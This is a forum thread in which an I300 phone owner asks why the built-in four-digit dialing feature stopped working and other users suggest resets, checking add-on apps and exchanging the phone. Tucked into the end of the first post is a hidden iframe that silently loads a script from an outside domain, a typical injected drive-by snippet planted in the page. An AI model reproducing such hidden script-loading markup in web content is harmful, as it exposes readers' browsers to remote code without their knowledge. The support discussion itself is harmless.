Four-Digit Dialing Problem

I mentioned this problem in another thread, but I'm hoping that by posting it as a new thread there will be a wider exposure.

I suddenly lost the four-digit dialing feature on my I300. For those not familiar with this feature, four-digit dialing comes built into the phone, and allows you to dial any number contained in your address book simply by dialling the last four digits of the number (see page 71 of the user's manual).

I've tried soft resets, hard resets and even reformatted the flash memory, all to no avail. Can anyone help?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

well it must have been something you installed on the phone..

did you sync this phone from a Palm pilot you already had?

what hacks or aps do you have on the phone?

have you tried to cold boot the phone and just use it in its "out of the box" status BEFORE you did any hotsyncing?

are you using desktop 4.0.1 and are on a PC (not mac)...

this will point us in a good direction to go in... most likely a app and not the phone itself...

I performed a hard reset and then, before doing a hot sync (or anything else), I entered a test phone number in the address book. Then I tried the four-digit dialing with just that number, but it didn't work. That's with no other software installed at all, basically as the phone came from the factory. Very strange, eh?

(another feature I didn't know was there!) Mine seems to work by the first method: tap four digits, tap "Talk", the name is displayed, then tap talk and it connects. I tested and it does NOT work if I have more than one number with the same last 4 digits - just lists the first one.
The second method: tap 4 digits, then Menu Launcher and select "4 Digit Dial" does just that - dials those 4 digits, which obviously doesn't work. Might be an address addon application you or I have?

Or maybe it's TheJakes fault with all of these hacks I have installed! (Just kidding Jake - NO WARRENTEES)!

do you see at the top right of the screen theres a "x/y" (where "x" is how many numbers has the four digits out of the possible "y" available). for example, say i have 3 numbers with the same last four digits (it could happen) , i tap the last 4 digits and is shows me 1/3.

make sense?

Gad, that IS strange! does anything else not work? if so , then take it back and exchange...

Everything else (except for the four-digit dialing) works, even the great picturephone, which I just installed. I'll wait another few days to see if anyone else can come up with a solution. If not, I'll probably take the phone back to Best Buy for an exchange.

This is getting weirder and weirder. When I test with two numbers with the same last four digits, it still displays only one and the x/y shows 01/01. Waaasssuuup? I'm going to try and unistall my AddressPlus app and see what happens.
